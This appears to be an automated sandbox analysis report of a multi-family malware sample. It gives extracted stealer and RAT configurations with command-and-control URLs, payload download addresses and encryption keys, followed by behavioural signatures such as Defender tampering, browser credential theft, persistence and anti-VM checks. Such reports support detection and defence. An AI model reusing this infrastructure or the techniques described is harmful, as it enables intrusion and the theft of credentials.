Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
29/03/2025, 09:47
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20250207-en
Behavioral task
behavioral2
Sample
2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
5ec95a42b16d80c72d17cc6d0bac58de
-
SHA1
9cfd9221606e1acfef1ea5f6f4bf88080822d5db
-
SHA256
f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b
-
SHA512
ca64237e9b54295b3162e26808d6c9acbef0640a996534425e21898b456e5117142bfe4d30473d2573ef42d08f0a85475d1cab63153e7b1b573011f67f735f0b
-
SSDEEP
24576:dqDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:dTvC/MTQYxsWR7a0X
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
quasar
1.5.0
Office04
goku92ad.zapto.org:5000
a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
-
encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Modded Client Startup
-
subdirectory
SubDir
Extracted
lumma
https://skynetxc.live/AksoPA
https://byteplusx.digital/aXweAX
https://travewlio.shop/ZNxbHi
https://apixtreev.run/LkaUz
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://tsparkiob.digital/KeASUp
https://appgridn.live/LEjdAK
https://cosmosyf.top/GOsznj
https://esccapewz.run/ANSbwqy
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://holidamyup.today/AOzkns
https://triplooqp.world/APowko
https://7wxayfarer.live/ALosnz
https://oreheatq.live/gsopp
https://castmaxw.run/ganzde
https://weldorae.digital/geds
https://steelixr.live/aguiz
https://smeltingt.run/giiaus
https://pferromny.digital/gwpd
Extracted
vidar
13.3
928af183c2a2807a3c0526e8c0c9369d
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detect Vidar Stealer 30 IoCs
resource yara_rule behavioral2/memory/5856-250-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-251-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-291-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-294-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-301-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-312-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-322-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-346-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-347-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-359-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-363-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-404-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-807-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-808-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-809-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-820-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-823-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-846-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-852-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-874-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-878-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-881-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-1259-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-1283-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-1286-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-1296-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-1311-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-1312-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5856-1313-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/2528-2136-0x00000000006A0000-0x0000000000AF6000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/2528-1344-0x00000000006A0000-0x0000000000AF6000-memory.dmp healer behavioral2/memory/2528-1345-0x00000000006A0000-0x0000000000AF6000-memory.dmp healer behavioral2/memory/2528-2187-0x00000000006A0000-0x0000000000AF6000-memory.dmp healer -
Healer family
-
Lumma family
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/memory/5308-134-0x0000000008640000-0x0000000008794000-memory.dmp family_quasar behavioral2/memory/5308-135-0x00000000053A0000-0x00000000053BA000-memory.dmp family_quasar -
Stealc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 202a17038f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE -
Blocklisted process makes network request 6 IoCs
flow pid Process 10 3852 powershell.exe 39 5308 powershell.exe 40 5308 powershell.exe 42 5308 powershell.exe 81 1436 powershell.exe 123 3536 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5128 powershell.exe 25264 powershell.exe 6116 powershell.exe 1892 powershell.exe 3624 powershell.exe 3404 PowerShell.exe 2032 powershell.exe 3996 powershell.exe 1816 powershell.exe 20216 powershell.exe 17908 powershell.exe 26540 powershell.exe 3852 powershell.exe 5308 powershell.exe 1436 powershell.exe 3536 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 13 IoCs
flow pid Process 81 1436 powershell.exe 46 2980 rapes.exe 46 2980 rapes.exe 46 2980 rapes.exe 46 2980 rapes.exe 10 3852 powershell.exe 35 2980 rapes.exe 165 1868 futors.exe 130 1868 futors.exe 63 1868 futors.exe 63 1868 futors.exe 82 1868 futors.exe 123 3536 powershell.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 1192 takeown.exe 5496 icacls.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 30 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5624 chrome.exe 4276 chrome.exe 25644 msedge.exe 18316 chrome.exe 2040 chrome.exe 544 msedge.exe 25076 chrome.exe 25588 chrome.exe 25580 chrome.exe 25748 msedge.exe 19948 chrome.exe 5612 msedge.exe 23108 chrome.exe 23072 chrome.exe 2156 msedge.exe 624 chrome.exe 3744 msedge.exe 2208 chrome.exe 25716 msedge.exe 860 chrome.exe 4816 chrome.exe 4752 msedge.exe 5404 msedge.exe 20156 chrome.exe 25268 chrome.exe 25732 msedge.exe 2924 chrome.exe 3104 chrome.exe 2912 chrome.exe 22892 chrome.exe -
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 202a17038f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 202a17038f.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation 22.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation Bell_Setup16.tmp Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation 22.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation rapes.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_07bc83df.cmd powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_07bc83df.cmd powershell.exe -
Executes dropped EXE 18 IoCs
pid Process 4884 Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE 2980 rapes.exe 5592 amnew.exe 1868 futors.exe 116 apple.exe 6020 22.exe 1224 22.exe 384 gron12321.exe 3108 accde9cdf4.exe 4016 v7942.exe 4888 TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE 4708 alex1dskfmdsf.exe 1532 483d2fa8a0d53818306efeb32d3.exe 2996 Bell_Setup16.exe 2284 202a17038f.exe 5172 Bell_Setup16.tmp 5636 Bell_Setup16.exe 4008 Bell_Setup16.tmp -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine 202a17038f.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE -
Loads dropped DLL 1 IoCs
pid Process 5760 regsvr32.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 1192 takeown.exe 5496 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\accde9cdf4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10367620101\\accde9cdf4.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10367630121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\202a17038f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10367950101\\202a17038f.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000024360-211.dat autoit_exe behavioral2/files/0x000a00000002439d-1074.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 4884 Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE 2980 rapes.exe 4888 TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE 1532 483d2fa8a0d53818306efeb32d3.exe 2284 202a17038f.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 384 set thread context of 4424 384 gron12321.exe 154 PID 4016 set thread context of 5856 4016 v7942.exe 197 PID 4708 set thread context of 4396 4708 alex1dskfmdsf.exe 214 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE File created C:\Windows\Tasks\futors.job amnew.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2796 sc.exe 1680 sc.exe 2948 sc.exe 3240 sc.exe 3928 sc.exe 4912 sc.exe 4552 sc.exe 5680 sc.exe 852 sc.exe 3460 sc.exe 1892 sc.exe 5512 sc.exe 2592 sc.exe 4948 sc.exe 848 sc.exe 5100 sc.exe 844 sc.exe 548 sc.exe 2840 sc.exe 5772 sc.exe 2420 sc.exe 5888 sc.exe 3004 sc.exe 2580 sc.exe 4748 sc.exe 1964 sc.exe 2360 sc.exe 2112 sc.exe 4732 sc.exe 4776 sc.exe 3400 sc.exe 2744 sc.exe 4908 sc.exe 1188 sc.exe 5024 sc.exe 5468 sc.exe 2040 sc.exe 3764 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
pid pid_target Process procid_target 18848 2528 WerFault.exe 380 18984 3052 WerFault.exe 378 24892 18916 WerFault.exe 393 25352 24920 WerFault.exe 415 11928 17156 WerFault.exe 482 24396 10320 WerFault.exe 502 18608 10376 WerFault.exe 501 -
System Location Discovery: System Language Discovery 1 TTPs 45 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language accde9cdf4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PowerShell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 202a17038f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 3556 timeout.exe 3764 timeout.exe 19684 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 3800 taskkill.exe 5824 taskkill.exe 4704 taskkill.exe 4452 taskkill.exe 5784 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133877153222343085" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings rapes.exe -
Modifies registry key 1 TTPs 4 IoCs
